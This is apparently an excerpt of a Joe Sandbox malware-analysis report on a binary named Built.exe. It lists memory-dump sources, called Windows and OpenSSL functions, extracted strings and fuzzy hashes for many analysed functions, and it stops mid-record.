                                                              • Opcode Fuzzy Hash: 3ba81f49d5ceb9f4a6875a9e5438a20396f096326d0a69e27fc56574318964df
                                                              • Instruction Fuzzy Hash: 1821A121B0CA8382EF20DB55F0209AAA3A9FB84794F404131EA9C47BDDEF7DE144DB00
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2091238325.00007FFDF10C1000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFDF10C0000, based on PE: true
                                                              • Associated: 00000005.00000002.2091206646.00007FFDF10C0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF10CD000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1125000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1139000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1149000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF115D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF130C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF130E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1339000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF136A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1390000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13DE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13E4000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13E6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1402000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF140F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2092865869.00007FFDF1413000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2092944994.00007FFDF1414000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffdf10c0000_Built.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastsocket
                                                              • String ID: ..\s\crypto\bio\b_sock2.c$2
                                                              • API String ID: 1120909799-2051290508
                                                              • Opcode ID: 2ef5472a3713315c0ebdeb3789e1964bedc6f77517e54092a2e54a431cd722de
                                                              • Instruction ID: 36e8ee6c24a503126ff06afdf51508586f0e0b8e01eb7c0f4b5f022ace0495e0
                                                              • Opcode Fuzzy Hash: 2ef5472a3713315c0ebdeb3789e1964bedc6f77517e54092a2e54a431cd722de
                                                              • Instruction Fuzzy Hash: 9201CC32F0859283E3109B25E4209ADB268FB81768F608235E67D83ADDCF3DE941CB40
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: FileWrite$ConsoleErrorLastOutput
                                                              • String ID:
                                                              • API String ID: 2718003287-0
                                                              • Opcode ID: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
                                                              • Instruction ID: 77261c2cbaf06afefafb77863e4951acd1de37324186b6549721a396861f4a6c
                                                              • Opcode Fuzzy Hash: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
                                                              • Instruction Fuzzy Hash: ECD12772B18A81CAEF10CF65D8401AC3B72FB45798F048239DE5D97B8ADE39D016DB42
                                                              APIs
                                                              • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF62665CFBB), ref: 00007FF62665D0EC
                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF62665CFBB), ref: 00007FF62665D177
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: ConsoleErrorLastMode
                                                              • String ID:
                                                              • API String ID: 953036326-0
                                                              • Opcode ID: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
                                                              • Instruction ID: c47d77fa4b4835e9aa27897f6ed74f9962e318b048ebcc3636f6b5a1fb7d199d
                                                              • Opcode Fuzzy Hash: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
                                                              • Instruction Fuzzy Hash: 6191E832F1865295FF609F659C4127D2BA0BB40B88F144139DE0E976D6CE3ED482EB07
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2091238325.00007FFDF10C1000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFDF10C0000, based on PE: true
                                                              • Associated: 00000005.00000002.2091206646.00007FFDF10C0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF10CD000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1125000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1139000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1149000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF115D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF130C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF130E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1339000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF136A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1390000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13DE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13E4000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13E6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1402000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF140F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2092865869.00007FFDF1413000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2092944994.00007FFDF1414000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffdf10c0000_Built.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast
                                                              • String ID: Operation not permitted$unknown
                                                              • API String ID: 1452528299-31098287
                                                              • Opcode ID: 98fd99213be571fb8821e332285a7a3172dfad59924788fedf6360fac81b26b1
                                                              • Instruction ID: 5916565582c9c4e3957436b2b11c1e5c5527d721a9f63cc47c6f73ca335a79d5
                                                              • Opcode Fuzzy Hash: 98fd99213be571fb8821e332285a7a3172dfad59924788fedf6360fac81b26b1
                                                              • Instruction Fuzzy Hash: D0816B21B0869286FB50AB51E875BBD23A8FB84784F840035DD6E87ADDCF3DE459D700
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: _get_daylight$_isindst
                                                              • String ID:
                                                              • API String ID: 4170891091-0
                                                              • Opcode ID: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
                                                              • Instruction ID: 614e647a57ed7aa687d5cf7d64855e2decccac492ccd7bb54dd9c1051a4f11c6
                                                              • Opcode Fuzzy Hash: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
                                                              • Instruction Fuzzy Hash: 8A51E472F082128AEF24DF249D566BC27A5FB50358F500135DE1ED2AE6DF3AA4019F03
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                              • String ID:
                                                              • API String ID: 2780335769-0
                                                              • Opcode ID: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
                                                              • Instruction ID: ac2fc6da97adcbe52dcd2b1ec6b1ed622f2d1fdc720641d3268b5036b9825285
                                                              • Opcode Fuzzy Hash: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
                                                              • Instruction Fuzzy Hash: 6451BC62E186828AFF10DFB1D8553BD23A1BB48B58F144435DE0D9B68ADF3DD450AB43
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: LongWindow$DialogInvalidateRect
                                                              • String ID:
                                                              • API String ID: 1956198572-0
                                                              • Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                              • Instruction ID: d86fb4ccf68ccb054c457f0c74111a0236675593fdd9ef4bc345d6e5123cef19
                                                              • Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                              • Instruction Fuzzy Hash: 8911E921A0C14382FE64876AFD9427A5296FB84780F544030DB4987B8DCDAFD491AB03
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                              • String ID:
                                                              • API String ID: 2933794660-0
                                                              • Opcode ID: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
                                                              • Instruction ID: 6fc467765ade9874935bc0f7b78c5c82d42c8f3ba605ebb62a0b7e8d01ab5b70
                                                              • Opcode Fuzzy Hash: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
                                                              • Instruction Fuzzy Hash: 86111C26B14B06CAEF00CB60EC552B933A4FB19758F440E31DA6D867A4DF7DD1689782
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2093117630.00007FFDF1441000.00000040.00000001.01000000.00000013.sdmp, Offset: 00007FFDF1440000, based on PE: true
                                                              • Associated: 00000005.00000002.2093030842.00007FFDF1440000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                              • Associated: 00000005.00000002.2093117630.00007FFDF14B3000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                              • Associated: 00000005.00000002.2093117630.00007FFDF14B6000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                              • Associated: 00000005.00000002.2093117630.00007FFDF14D9000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                              • Associated: 00000005.00000002.2093117630.00007FFDF14E4000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                              • Associated: 00000005.00000002.2093117630.00007FFDF14EE000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                              • Associated: 00000005.00000002.2093710336.00007FFDF14F1000.00000080.00000001.01000000.00000013.sdmpDownload File
                                                              • Associated: 00000005.00000002.2093754080.00007FFDF14F3000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffdf1440000_Built.jbxd
                                                              Similarity
                                                              • API ID: 00007E103011
                                                              • String ID: ..\s\ssl\statem\statem_clnt.c
                                                              • API String ID: 2803769598-1507966698
                                                              • Opcode ID: bdca41ec7c04a826cd1d36dbe52d2f7b51269d51a5f3c02775a26b1210e1a4b4
                                                              • Instruction ID: 8a30b87766b97be4a47cb4f2bddc2559f470e06698eb1393b5b25d9272530e95
                                                              • Opcode Fuzzy Hash: bdca41ec7c04a826cd1d36dbe52d2f7b51269d51a5f3c02775a26b1210e1a4b4
                                                              • Instruction Fuzzy Hash: 5EC1B372B08B4285EB688F61E460ABD67A9FB847A8F148135DFAD577C9DF3CD1908700
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2093117630.00007FFDF1441000.00000040.00000001.01000000.00000013.sdmp, Offset: 00007FFDF1440000, based on PE: true
                                                              • Associated: 00000005.00000002.2093030842.00007FFDF1440000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                              • Associated: 00000005.00000002.2093117630.00007FFDF14B3000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                              • Associated: 00000005.00000002.2093117630.00007FFDF14B6000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                              • Associated: 00000005.00000002.2093117630.00007FFDF14D9000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                              • Associated: 00000005.00000002.2093117630.00007FFDF14E4000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                              • Associated: 00000005.00000002.2093117630.00007FFDF14EE000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                              • Associated: 00000005.00000002.2093710336.00007FFDF14F1000.00000080.00000001.01000000.00000013.sdmpDownload File
                                                              • Associated: 00000005.00000002.2093754080.00007FFDF14F3000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffdf1440000_Built.jbxd
                                                              Similarity
                                                              • API ID: 00007$E103011
                                                              • String ID: ..\s\ssl\ssl_sess.c
                                                              • API String ID: 1116935741-2868363209
                                                              • Opcode ID: 330f54d2262cd26ac1954423d928ad117dd1f709cc5969c2bca93fc8397799ae
                                                              • Instruction ID: cbf96281fb47a052d0d21b96c9e81491b44055d27b0aec9ad01848994786a30d
                                                              • Opcode Fuzzy Hash: 330f54d2262cd26ac1954423d928ad117dd1f709cc5969c2bca93fc8397799ae
                                                              • Instruction Fuzzy Hash: 7EC17F3270968286E7648F15E564BA933A8FB84B98F040235EE6D8F7DCDF79E545CB00
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: _get_daylight$_invalid_parameter_noinfo
                                                              • String ID: ?
                                                              • API String ID: 1286766494-1684325040
                                                              • Opcode ID: 8108d8be77440c3e9c62f2a415d3a3f63afd5a4d850aaf976d1496cecaf540be
                                                              • Instruction ID: 37800e8361a3dfe703810459f1b1267ab54125d95f0b7731b7bdae98e5dc0b6c
                                                              • Opcode Fuzzy Hash: 8108d8be77440c3e9c62f2a415d3a3f63afd5a4d850aaf976d1496cecaf540be
                                                              • Instruction Fuzzy Hash: 55411922A1868345FF249B25F8423796660FB80BA4F144239EF5D86AD5DE3ED441DF03
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2091238325.00007FFDF10C1000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFDF10C0000, based on PE: true
                                                              • Associated: 00000005.00000002.2091206646.00007FFDF10C0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF10CD000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1125000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1139000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1149000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF115D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF130C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF130E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1339000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF136A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1390000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13DE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13E4000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13E6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1402000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF140F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2092865869.00007FFDF1413000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2092944994.00007FFDF1414000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffdf10c0000_Built.jbxd
                                                              Similarity
                                                              • API ID: 00007
                                                              • String ID: %02d%02d%02d%02d%02d%02dZ$%04d%02d%02d%02d%02d%02dZ
                                                              • API String ID: 3568877910-2648760357
                                                              • Opcode ID: 2a3bc1689ddc0f887af3b9ff0742d7664fa732a47decfc4233859a34b1d629f8
                                                              • Instruction ID: 53da04e26ecd533bc66b5825d1977f7265a4212021ce99b7354ecbbc7df90be8
                                                              • Opcode Fuzzy Hash: 2a3bc1689ddc0f887af3b9ff0742d7664fa732a47decfc4233859a34b1d629f8
                                                              • Instruction Fuzzy Hash: F4512D32F186818AE760DB19F450A6AB7A5FB89784F444135EA9D87B99DF3CE8448F00
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2091238325.00007FFDF10C1000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFDF10C0000, based on PE: true
                                                              • Associated: 00000005.00000002.2091206646.00007FFDF10C0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF10CD000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1125000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1139000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1149000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF115D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF130C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF130E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1339000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF136A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1390000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13DE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13E4000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF13E6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF1402000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2091238325.00007FFDF140F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2092865869.00007FFDF1413000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                              • Associated: 00000005.00000002.2092944994.00007FFDF1414000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ffdf10c0000_Built.jbxd
                                                              Similarity
                                                              • API ID: getaddrinfo
                                                              • String ID: ..\s\crypto\bio\b_addr.c
                                                              • API String ID: 300660673-2547254400
                                                              • Opcode ID: a0b5319feac94952a1432a4b762969270d9d630226e0b1293bfa37404cbb0f4b
                                                              • Instruction ID: 0dc913c1a985d54a33f1dc26db789d960db3f6d68cac31255068395fdeef3281
                                                              • Opcode Fuzzy Hash: a0b5319feac94952a1432a4b762969270d9d630226e0b1293bfa37404cbb0f4b
                                                              • Instruction Fuzzy Hash: 6E41B272F1868287E7509B12A460ABA77A4FB85744F508139FA9E43BC9DF3CD845CB40
                                                              APIs
                                                              • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6266590B6
                                                                • Part of subcall function 00007FF62665A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF626662D92,?,?,?,00007FF626662DCF,?,?,00000000,00007FF626663295,?,?,?,00007FF6266631C7), ref: 00007FF62665A9CE
                                                                • Part of subcall function 00007FF62665A9B8: GetLastError.KERNEL32(?,?,?,00007FF626662D92,?,?,?,00007FF626662DCF,?,?,00000000,00007FF626663295,?,?,?,00007FF6266631C7), ref: 00007FF62665A9D8
                                                              • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF62664CC15), ref: 00007FF6266590D4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                              • String ID: C:\Users\user\AppData\Local\Temp\Built.exe
                                                              • API String ID: 3580290477-3074098987
                                                              • Opcode ID: 2cf9991d5cc0f55d4af5251d222b056ff2fa25707e1fd1ed9fb4097698885552
                                                              • Instruction ID: c4784340ecc49216068ea27e7b8f106d7242c23d749b736892174fab2a9ed293
                                                              • Opcode Fuzzy Hash: 2cf9991d5cc0f55d4af5251d222b056ff2fa25707e1fd1ed9fb4097698885552
                                                              • Instruction Fuzzy Hash: 5E41BF32A08B6285EF149F25EC821BC27A8FB457C4F454135E94D83B96DE3FE4859B43
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
